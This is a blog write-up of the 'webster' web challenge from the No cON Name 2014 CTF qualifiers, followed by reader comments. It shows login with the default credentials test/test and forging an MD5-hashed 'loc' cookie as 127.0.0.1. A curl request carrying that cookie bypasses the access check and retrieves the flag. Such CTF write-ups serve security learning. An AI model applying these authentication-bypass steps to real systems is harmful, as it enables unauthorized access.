CTF, NcN, quals,

WEBster [No cON Name 2014 CTF – QUALS]

This year «No cON Name Capture The Flag» quals had more than three challenges to compete for the final, so big thanks to organizers to extend last year limit. At now ( 09:27 am GMT+2 ), @DefCon-UA (dcua team) have finished all challenges and have left +12 hours for competition’s end. So it’s time to draft some web write-ups.

all finished

First «webster» 200 points web challenge, show us a login form that after multiples sqli, xpath, ldap… injections with no luck,  tried login common accounts.

Username ‘test’ and password ‘test’ was the lucky one to access main private area.

private_area

 

We have id, filename, location, username on 4 files where captain obvious says flag.txt is our target file. But not to fast, something is blocking our tries to read this file. It says:

"Seems that you are not in the right place for that"

So am i not in the right place? where could we go to get permissions on that file ? See the cookies, pay close attention in one called ‘loc’:

pantallazo_ 2014-09-14 a la(s) 10.41.31

 

 

Oh! Seems md5 for something we can’t find in our first try. But wait, maybe location means ip ? let’s try wuth the one appears on the column;

>>> ip='10.128.29.136'
>>> hashlib.md5(ip).hexdigest()
'c869d000ef5c6fdfa128b058d2865512'

Yes! It’s the same ip in hash format, so can you figure out the rest? Let’s try to replace this cookie with 127.0.0.1 (f528764d624db129b32c21fbca0cb8d6) location.

$ curl -vvv -k 'https://ctf.noconname.org/webster/content.php?op=4' -H 'Cookie: loc=f528764d624db129b32c21fbca0cb8d6; valid_user=test;  PHPSESSID=uo8lqqhf0slqhn6nbclbnosp04;'
* Adding handle: conn: 0x7fe7cb804000
* Adding handle: send: 0
* Adding handle: recv: 0
* Curl_addHandleToPipeline: length: 1
* - Conn 0 (0x7fe7cb804000) send_pipe: 1, recv_pipe: 0
* About to connect() to ctf.noconname.org port 443 (#0)
*   Trying 88.87.208.202...
* Connected to ctf.noconname.org (88.87.208.202) port 443 (#0)
* TLS 1.0 connection using TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
* Server certificate: ctf.noconname.org
> GET /webster/content.php?op=4 HTTP/1.1
> User-Agent: curl/7.30.0
> Host: ctf.noconname.org
> Accept: */*
> Cookie: loc=f528764d624db129b32c21fbca0cb8d6; valid_user=test;  PHPSESSID=uo8lqqhf0slqhn6nbclbnosp04;
>
< HTTP/1.1 200 OK
* Server nginx is not blacklisted
< Server: nginx
< Date: Sun, 14 Sep 2014 08:55:48 GMT
< Content-Type: text/html
< Content-Length: 38
< Connection: keep-alive
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Strict-Transport-Security: max-age=15768000

NCN_f528764d624db129b32c21fbca0cb8d6

flag: NCN_f528764d624db129b32c21fbca0cb8d6

ps: Thanks to my dcua team mates.

 



4 Comments

Longinos Recuero Bustos

septiembre 15, 2014

An excellent explanation. Best imposilble!

See you soon!!

tunelko

septiembre 15, 2014

Thanks :)

dook

septiembre 15, 2014

Awesome! Been searching for some writeups from NCN, yours is the best so far. Nice detail, screenshots and explains it well.
Many Thanks

And congrats to your team! :)

tunelko

septiembre 15, 2014

I’m sure more writeups will be published, what team are you ?
Thanks for your comments!

Leave a Reply to Longinos Recuero Bustos Cancelar la respuesta

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.